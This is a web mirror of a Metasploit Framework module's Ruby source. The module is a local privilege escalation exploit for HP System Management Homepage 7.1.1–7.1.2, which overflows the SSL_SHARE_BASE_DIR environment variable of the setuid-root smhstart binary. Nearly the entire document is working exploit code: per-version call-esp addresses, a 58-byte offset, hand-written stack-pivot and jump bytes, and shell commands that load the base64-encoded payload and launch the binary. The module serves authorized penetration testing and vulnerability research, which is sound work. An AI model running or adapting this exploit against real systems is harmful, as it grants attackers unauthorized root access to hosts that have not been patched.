Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/local/hp_smhstart.rb
31978 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::EXE

10
  include Msf::Post::File

11


12
  include Msf::Exploit::Local::Linux

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        {

19
          'Name' => 'HP System Management Homepage Local Privilege Escalation',

20
          'Description' => %q{

21
            Versions of HP System Management Homepage <= 7.1.2 include a setuid root

22
            smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR

23
            env variable.

24
          },

25
          'License' => MSF_LICENSE,

26
          'Author' => [

27
            'agix' # @agixid # Vulnerability discovery and Metasploit module

28
          ],

29
          'Platform' => [ 'linux' ],

30
          'SessionTypes' => [ 'shell' ],

31
          'Payload' => {

32
            'Space' => 227,

33
            'BadChars' => "\x00\x22"

34
          },

35
          'References' => [

36
            ['OSVDB', '91990']

37
          ],

38
          'Targets' => [

39
            [

40
              'HP System Management Homepage 7.1.1',

41
              {

42
                'Arch' => ARCH_X86,

43
                'CallEsp' => 0x080c86eb, # call esp

44
                'Offset' => 58

45
              }

46
            ],

47
            [

48
              'HP System Management Homepage 7.1.2',

49
              {

50
                'Arch' => ARCH_X86,

51
                'CallEsp' => 0x080c8b9b, # call esp

52
                'Offset' => 58

53
              }

54
            ],

55
          ],

56
          'DefaultOptions' => {

57
            'PrependSetuid' => true

58
          },

59
          'DefaultTarget' => 0,

60
          'DisclosureDate' => '2013-03-30',

61
          'Notes' => {

62
            'Reliability' => UNKNOWN_RELIABILITY,

63
            'Stability' => UNKNOWN_STABILITY,

64
            'SideEffects' => UNKNOWN_SIDE_EFFECTS

65
          }

66
        }

67
      )

68
    )

69
    register_options([

70
      OptString.new('smhstartDir', [ true, 'smhstart directory', '/opt/hp/hpsmh/sbin/' ])

71
    ])

72
  end

73


74
  def exploit

75
    pl = payload.encoded

76
    padding = rand_text_alpha(target['Offset'])

77
    ret = [target['CallEsp']].pack('V')

78
    exploit = pl

79
    exploit << ret

80
    exploit << "\x81\xc4\x11\xff\xff\xff"	# add esp, 0xffffff11

81
    exploit << "\xe9\x0e\xff\xff\xff"	# jmp => beginning of pl

82
    exploit << padding

83
    exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better

84
    id = cmd_exec('id -un')

85
    if id != 'hpsmh'

86
      fail_with(Failure::NoAccess, "You are #{id}, you must be hpsmh to exploit this")

87
    end

88
    cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)")

89
    cmd_exec("#{datastore['smhstartDir']}/smhstart")

90
  end

91
end

92


93